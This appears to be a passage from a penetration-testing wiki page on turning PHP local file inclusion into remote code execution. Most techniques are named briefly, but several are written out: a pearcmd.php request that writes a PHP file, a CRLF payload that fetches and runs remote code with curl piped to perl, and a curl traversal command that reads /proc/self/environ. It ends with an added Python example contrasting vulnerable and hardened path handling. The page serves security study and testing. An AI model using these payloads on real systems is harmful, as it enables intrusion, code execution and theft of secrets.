Via segmentation fault

Upload a file that will be stored as a temporary file in /tmp, then, in the same request, trigger a segmentation fault; the temporary file won't be deleted and you can search for it.

LFI2RCE via Segmentation Fault

Via Nginx temp file storage

If you found a Local File Inclusion and Nginx is running in front of PHP you might be able to obtain RCE with the following technique:

LFI2RCE via Nginx temp files

Via PHP_SESSION_UPLOAD_PROGRESS

If you found a Local File Inclusion, even if you don't have a session and session.auto_start is Off, you can still get a session file: if you provide PHP_SESSION_UPLOAD_PROGRESS in multipart POST data, PHP will enable the session for you (this relies on session.upload_progress.enabled, which is On by default). You can abuse this to get RCE:

LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS

Via temp file uploads in Windows

If you found a Local File Inclusion and the server is running on Windows you might get RCE:

LFI2RCE Via temp file uploads

Via pearcmd.php + URL args

As explained in this post, the script /usr/local/lib/php/pearcmd.php exists by default in the official php docker images. Moreover, it's possible to pass arguments to the script via the URL: the query string is split on + and any piece that does not contain an = is used as an argument (this needs register_argc_argv, which is on in those images because they ship without a php.ini). See also watchTowr's write-up and Orange Tsai's "Confusion Attacks".

The following request creates the file /tmp/hello.php with the content <?=phpinfo()?>:

GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1

The following abuses a CRLF vulnerability to get RCE (from here):

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

Via phpinfo() (file_uploads = on)

If you found a Local File Inclusion and a file exposing phpinfo() with file_uploads = on you can get RCE:

LFI2RCE via phpinfo()

Via compress.zlib + PHP_STREAM_PREFER_STDIO + Path Disclosure

If you found a Local File Inclusion and you can exfiltrate the path of the temporary file, BUT the server is checking whether the file to be included contains PHP marks, you can try to bypass that check with this Race Condition:

LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STDIO + Path Disclosure

Via eternal waiting + bruteforce

If you can abuse the LFI to upload temporary files and make the server hang the PHP execution, you can then brute force file names for hours looking for the temporary file:

LFI2RCE via Eternal waiting

Via Fatal Error

If you include any of the files /usr/bin/phar, /usr/bin/phar7, /usr/bin/phar.phar7, /usr/bin/phar.phar (you need to include the same one twice to trigger the error).

It is not clear how this could be useful, but it might be.
Even if you cause a PHP Fatal Error, the temporary files PHP created for uploads are deleted (unlike the segmentation-fault case above).

Preserve traversal sequences from the client

Some HTTP clients normalize or strip ../ before the request reaches the server, which breaks directory traversal payloads. Use curl --path-as-is to leave traversal untouched when exploiting log/download endpoints that concatenate a user-controlled filename (the flag only affects the URL path; curl never rewrites query-string values, so it matters most when the filename is part of the path), and add --ignore-content-length for pseudo-files like /proc, whose reported size does not match their content:

curl --path-as-is -b "session=$SESSION" \
"http://TARGET/admin/get_system_log?log_identifier=../../../../proc/self/environ" \
--ignore-content-length -s | tr '\000' '\n'

Adjust the number of ../ segments until you escape the intended directory, then dump /etc/passwd, /proc/self/cwd/app.py, or other source/config files.
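To make the two halves of this concrete, the following added example (not code from the page) shows what a normalizing client does to a traversal in the URL path (RFC 3986 dot-segment removal, the behaviour --path-as-is switches off), builds a raw request that keeps the path untouched, and contrasts the naive server-side concatenation such endpoints perform with a check that keeps the resolved path inside the log directory. The log directory and the endpoint are assumptions for the example.

```python
import posixpath

# Assumed directory the vulnerable endpoint concatenates the identifier onto.
LOG_DIR = "/var/log/app"


def remove_dot_segments(path: str) -> str:
    """RFC 3986 section 5.2.4: the normalization browsers and curl apply to a URL path
    before sending it, which is what destroys '../' placed in the path."""
    out = []
    segments = path.split("/")[1:]  # drop the empty element from the leading '/'
    for seg in segments:
        if seg == "..":
            if out:
                out.pop()
        elif seg != ".":
            out.append(seg)
    if segments and segments[-1] in (".", ".."):
        out.append("")  # a trailing dot segment leaves a trailing slash
    return "/" + "/".join(out)


def raw_get_request(host: str, path_and_query: str, cookie: str = "") -> bytes:
    """Build the request bytes yourself (equivalent to curl --path-as-is) so the
    server sees exactly the path you wrote."""
    lines = [f"GET {path_and_query} HTTP/1.1", f"Host: {host}"]
    if cookie:
        lines.append(f"Cookie: {cookie}")
    lines.append("Connection: close")
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def vulnerable_log_path(log_identifier: str) -> str:
    """What a naive endpoint does: concatenate, then let the OS resolve the '..'."""
    return posixpath.normpath(LOG_DIR + "/" + log_identifier)


def hardened_log_path(log_identifier: str):
    """Resolve first, then require the result to stay under LOG_DIR; None means reject.
    This also rejects absolute identifiers, which posixpath.join would otherwise honour."""
    candidate = posixpath.normpath(posixpath.join(LOG_DIR, log_identifier))
    if posixpath.commonpath([LOG_DIR, candidate]) != LOG_DIR:
        return None
    return candidate


if __name__ == "__main__":
    traversal = "../../../../proc/self/environ"
    print("client-normalized path :", remove_dot_segments("/admin/" + traversal))
    print(raw_get_request("TARGET", f"/admin/get_system_log?log_identifier={traversal}").decode())
    print("vulnerable server resolves to:", vulnerable_log_path(traversal))
    print("hardened server answers      :", hardened_log_path(traversal))
```

Run the functions against the exact identifier you plan to send: if vulnerable_log_path() already lands outside LOG_DIR with your depth of ../, any extra segments are harmless, since normpath discards ".." above the root just as the kernel does.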
